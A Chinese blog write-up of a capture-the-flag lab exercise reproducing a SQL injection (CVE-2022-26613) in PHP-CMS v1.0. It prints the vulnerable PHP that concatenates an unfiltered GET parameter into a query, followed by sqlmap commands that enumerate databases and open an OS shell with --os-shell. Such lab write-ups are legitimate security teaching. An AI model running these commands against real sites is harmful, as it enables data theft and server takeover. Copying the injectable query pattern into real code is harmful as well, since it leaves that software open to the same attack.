【漏洞复现】PHP-CMS v1.0 SQL注入漏洞(CVE-2022-26613)
【漏洞复现】PHP-CMS v1.0 SQL注入漏洞(CVE-2022-26613)
0x01 漏洞描述
春秋云镜靶场:PHP-CMS v1.0存在SQL注入漏洞,攻击者可获得敏感信息。
CVE:PHP-CMS v1.0 was discovered to contain a SQL injection vulnerability via the category parameter in categorymenu.php.
0x02 影响版本
PHP-CMS v1.0
http://pwned_host.com/PHP-CMS-master/categorymenu.php
http://pwned_host.com/PHP-CMS-master/forgot.php
http://pwned_host.com/PHP-CMS-master/post.php
http://pwned_host.com/PHP-CMS-master/search.php
0x03 漏洞分析
用户可以在没有任何过滤器的情况下通过GET方法控制参数category。
源码:
<?php
if(isset($_GET['category'])){
$post_category_id = $_GET['category'];
}
$query = "SELECT * FROM posts WHERE post_category_id = {$post_category_id} ";
$select_all_posts_count_query = mysqli_query($connection,$query);
$count = mysqli_num_rows($select_all_posts_count_query);
confirm_query($select_all_posts_count_query);
……
while($row = mysqli_fetch_assoc($select_all_posts_count_query)){
$post_id = $row['post_id'];
$post_title = $row['post_title'];
$post_user = $row['post_user'];
$post_date = $row['post_date'];
$post_image = $row['post_image'];
$post_content = $row['post_content'];
?>
详细参考:https://github.com/harshitbansal373/PHP-CMS/issues/14
0x04 漏洞复现
进入靶场,界面如下:
点击页面右下角Categories中的#home
标签,转入categorymenu.php?category=1
页面,单引号测试存在注入点
使用sqlmap爆库名
sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 --dbs
没有发现明显的flag提示,继续测试数据库mysql和cms
sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 -D mysql --tables
sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 -D cms --tables
猜测可能不在数据库中,使用os-shell命令直接从根目录找/flag
sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 --os-shell
找到flag
本文来自博客园,作者:0dot7,转载请注明原文链接:https://www.cnblogs.com/0dot7/p/17229519.html
文章如有错误,欢迎各位师傅指正!!!
免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!